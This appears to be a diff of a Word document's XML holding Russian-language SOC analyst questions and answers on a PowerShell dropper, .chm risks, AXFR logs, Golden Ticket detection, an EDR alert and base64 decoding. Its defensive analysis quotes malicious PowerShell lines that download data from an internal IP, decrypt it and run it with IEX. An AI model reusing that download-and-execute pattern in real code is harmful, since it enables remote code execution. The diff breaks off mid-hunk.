+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">7. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Расшифровка и выполнение данных </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>powershell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -3286,43 +3912,70 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve"> $DAtA=$WC.DownloadData($SER+$T); Скрипт создает URL-адрес и загружает с него данные. Похоже, он подключается к локальному IP-адресу (10.6.100.123), что может указывать на сервер управления и контроля или другой вредоносный источник. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">7. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Расшифровка и выполнение данных powershell</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -join [Char[]](&amp;$R $datA($IV+$K)) | IEX Загруженные данные обрабатываются с помощью пользовательской функции расшифровки ($R) и выполняются с помощью IEX (Invoke-Expression). Это распространенный метод запуска динамически сгенерированных или загруженных скриптов. </w:t>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>join</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>Char</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>[]](&amp;$R $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>datA</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">($IV+$K)) | IEX Загруженные данные обрабатываются с помощью пользовательской функции расшифровки ($R) и выполняются с </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>помощью IEX (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>Invoke-Expression</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">). Это распространенный метод запуска динамически сгенерированных или загруженных скриптов. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3399,7 +4052,21 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>Такое поведение типично для вредоносных программ или других вредоносных скриптов, нацеленных на использование PowerShell для несанкционированных действий.</w:t>
+        <w:t xml:space="preserve">Такое поведение типично для вредоносных программ или других вредоносных скриптов, нацеленных на использование </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> для несанкционированных действий.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3480,7 +4147,6 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
@@ -3521,20 +4187,44 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Почему файлы с расширением «chm» могут быть опасны?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Файлы с расширением «.chm» (Compiled HTML Help) могут представлять опасность по нескольким причинам:</w:t>
+        <w:t>Почему файлы с расширением «</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>chm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>» могут быть опасны?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Файлы с расширением «.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>chm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>» (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Compiled</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> HTML Help) могут представлять опасность по нескольким причинам:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3636,7 +4326,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>У вас есть логи с DNS-сервера, и вы видите много AXFR-запросов с одного внешнего IP. Это вредоносно? Если да, то почему?</w:t>
+        <w:t xml:space="preserve">У вас есть логи с DNS-сервера, и вы видите много AXFR-запросов с одного внешнего IP. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Является ли это вредоносным? Если да, то почему?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3667,7 +4360,15 @@
         <w:t>Сбор информации</w:t>
       </w:r>
       <w:r>
-        <w:t>: Злоумышленники могут использовать AXFR-запросы для сбора информации о вашем домене, включая все поддомены, IP-адреса и другие записи. Эта информация может быть использована для планирования атак.</w:t>
+        <w:t xml:space="preserve">: Злоумышленники могут использовать AXFR-запросы для сбора информации о вашем домене, включая все </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>поддомены</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, IP-адреса и другие записи. Эта информация может быть использована для планирования атак.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3703,14 +4404,23 @@
         <w:t>Атаки на инфраструктуру</w:t>
       </w:r>
       <w:r>
-        <w:t>: Получив полную зону, злоумышленник может анализировать вашу инфраструктуру, выявлять слабые места и разрабатывать стратегии для дальнейших атак, таких как DDoS или фишинг.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
+        <w:t xml:space="preserve">: Получив полную зону, злоумышленник может анализировать вашу инфраструктуру, выявлять слабые места и разрабатывать стратегии для дальнейших атак, таких как </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>DDoS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> или фишинг.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
@@ -3731,7 +4441,31 @@
         <w:t>DNS-сервер</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> не защищен должным образом, что может привести к другим атакам, таким как spoofing или cache poisoning.</w:t>
+        <w:t xml:space="preserve"> не защищен должным образом, что может привести к другим атакам, таким как </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>spoofing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> или </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cache</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>poisoning</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3780,20 +4514,36 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Как обнаружить атаку Golden Ticket?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Атака Golden Ticket — это метод компрометации, используемый злоумышленниками для получения несанкционированного доступа к ресурсам в сети Windows. Вот несколько шагов, которые помогут обнаружить такую атаку:</w:t>
+        <w:t xml:space="preserve">Как обнаружить атаку Golden </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Ticket</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Атака Golden </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Ticket</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> — это метод компрометации, используемый злоумышленниками для получения несанкционированного доступа к ресурсам в сети Windows. Вот несколько шагов, которые помогут обнаружить такую атаку:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3817,7 +4567,6 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
@@ -3841,8 +4590,16 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Анализ Kerberos</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Анализ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Kerberos</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>: Ищите аномальные запросы на получение билетов (TGT), которые могут указывать на использование поддельных билетов.</w:t>
       </w:r>
@@ -3932,10 +4689,26 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Конфигурация Kerberos</w:t>
-      </w:r>
-      <w:r>
-        <w:t>: Убедитесь, что настройки Kerberos соответствуют рекомендациям безопасности, и используйте только современные версии протокола.</w:t>
+        <w:t xml:space="preserve">Конфигурация </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Kerberos</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">: Убедитесь, что настройки </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Kerberos</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> соответствуют рекомендациям безопасности, и используйте только современные версии протокола.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3989,7 +4762,23 @@
         <w:t>Инструменты анализа</w:t>
       </w:r>
       <w:r>
-        <w:t>: Используйте инструменты, такие как BloodHound или Mimikatz, чтобы выявить аномалии в доступе и привилегиях.</w:t>
+        <w:t xml:space="preserve">: Используйте инструменты, такие как </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>BloodHound</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> или </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Mimikatz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, чтобы выявить аномалии в доступе и привилегиях.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4076,7 +4865,15 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>Следуя этим шагам, можно повысить вероятность выявления атак Golden Ticket и улучшить общую безопасность сети.</w:t>
+        <w:t xml:space="preserve">Следуя этим шагам, можно повысить вероятность выявления атак Golden </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Ticket</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> и улучшить общую безопасность сети.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4093,7 +4890,13 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Представьте, что злоумышленник взломал ваш контроллер домена. Предложите сценарий исправления для этой ситуации.</w:t>
+        <w:t xml:space="preserve">Представьте, что злоумышленник </w:t>
+      </w:r>
+      <w:r>
+        <w:t>скомпрометировал</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> ваш контроллер домена. Предложите сценарий исправления для этой ситуации.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4180,6 +4983,7 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
@@ -4256,7 +5060,15 @@
         <w:t>Проверка на вредоносное ПО</w:t>
       </w:r>
       <w:r>
-        <w:t>: Запустите антивирусные и антималварные сканирования.</w:t>
+        <w:t xml:space="preserve">: Запустите антивирусные и </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>антималварные</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> сканирования.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4339,7 +5151,6 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
@@ -4470,7 +5281,15 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Какая функция PowerShell 5 является лучшей для команды безопасности?</w:t>
+        <w:t xml:space="preserve">Какая функция </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 5 является лучшей для команды безопасности?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4485,9 +5304,11 @@
       <w:r>
         <w:t xml:space="preserve">В </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>PowerShell</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> 5.0 одной из лучших функций для команды безопасности является </w:t>
       </w:r>
@@ -4496,8 +5317,17 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Get-EventLog</w:t>
-      </w:r>
+        <w:t>Get-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>EventLog</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve">. Эта команда позволяет администраторам просматривать журналы событий </w:t>
       </w:r>
@@ -4528,8 +5358,17 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Get-Acl</w:t>
-      </w:r>
+        <w:t>Get-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Acl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> – для получения списка прав доступа к файлам и папкам.</w:t>
       </w:r>
@@ -4541,6 +5380,7 @@
       <w:r>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -4548,6 +5388,7 @@
         </w:rPr>
         <w:t>Set-Acl</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> – для изменения прав доступа.</w:t>
       </w:r>
@@ -4564,8 +5405,17 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Get-WinEvent</w:t>
-      </w:r>
+        <w:t>Get-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>WinEvent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> – для работы с более современными журналами событий, позволяя фильтровать и анализировать события.</w:t>
       </w:r>
@@ -4577,12 +5427,21 @@
       <w:r>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Invoke-Command</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Invoke</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>-Command</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> – для выполнения команд на удаленных системах с учетом безопасности.</w:t>
@@ -4650,38 +5509,47 @@
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t>OS Type: windows</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
+        <w:t xml:space="preserve">OS Type: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>windows</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t>MD5: 59c34bc243eb2604533b5f08d30944f8</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>MD5: 59c34bc243eb2604533b5f08d30944f8</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:i/>
           <w:iCs/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
         <w:t>SHA-256: ef214626923d76e24ae5299dd16c53b15847e91a97d2eea79ce951c6bead9b7c</w:t>
       </w:r>
     </w:p>
@@ -4703,7 +5571,31 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>На основании предоставленной информации об оповещении от решения EDR (Endpoint Detection and Response) мы можем оценить ситуацию следующим образом:</w:t>
+        <w:t>На основании предоставленной информации об оповещении от решения EDR (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Endpoint</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Detection</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Response) мы можем оценить ситуацию следующим образом:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4718,13 +5610,39 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Информация о процессе</w:t>
+        <w:t>Информация</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:u w:val="single"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>о</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>процессе</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t>:</w:t>
       </w:r>
     </w:p>
@@ -4753,6 +5671,7 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">    Process ID (PID): 6508</w:t>
       </w:r>
     </w:p>
@@ -4819,7 +5738,15 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>Вы можете проверить хэши на таких платформах, как VirusTotal, чтобы определить, является ли файл вредоносным.</w:t>
+        <w:t xml:space="preserve">Вы можете проверить хэши на таких платформах, как </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>VirusTotal</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, чтобы определить, является ли файл вредоносным.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4843,18 +5770,25 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>Используйте предоставленные хеш-значения (MD5 и SHA-256) для поиска в базах данных аналитики угроз (например, VirusTotal), чтобы определить, был ли этот конкретный файл помечен как вредоносный.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Используйте предоставленные хеш-значения (MD5 и SHA-256) для поиска в базах данных аналитики угроз (например, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>VirusTotal</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>), чтобы определить, был ли этот конкретный файл помечен как вредоносный.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
         <w:t>Репутация файла</w:t>
       </w:r>
       <w:r>
@@ -4951,7 +5885,15 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>Заключение (Conclusion):</w:t>
+        <w:t>Заключение (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Conclusion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>):</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4976,7 +5918,15 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>В ходе расследования вы видите следующую информацию:   (хеш)</w:t>
+        <w:t>В ходе расследования вы видите следующую информацию:   (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>хеш</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4997,31 +5947,7 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>Похоже, строк</w:t>
-      </w:r>
-      <w:r>
-        <w:t>а</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, закодирова</w:t>
-      </w:r>
-      <w:r>
-        <w:t>на</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> в base64, котор</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ая</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> обычно используется для кодирования двоичных данных в текст ASCII для безопасной передачи по текстовым протоколам. Декодирование этой строки Base64 раскроет ее исходное содержимое. Для декодирования строки Base64 вы можете использовать различные онлайн-инструменты или языки программирования</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, например </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Python:</w:t>
+        <w:t>Похоже, строка, закодирована в base64, которая обычно используется для кодирования двоичных данных в текст ASCII для безопасной передачи по текстовым протоколам. Декодирование этой строки Base64 раскроет ее исходное содержимое. Для декодирования строки Base64 вы можете использовать различные онлайн-инструменты или языки программирования, например Python:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5036,7 +5962,14 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>import base64</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>import</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> base64</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5051,8 +5984,21 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t># Base64 encoded string</w:t>
-      </w:r>
+        <w:t xml:space="preserve"># Base64 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>encoded</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5071,7 +6017,18 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>encoded_string = "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"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>encoded_string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
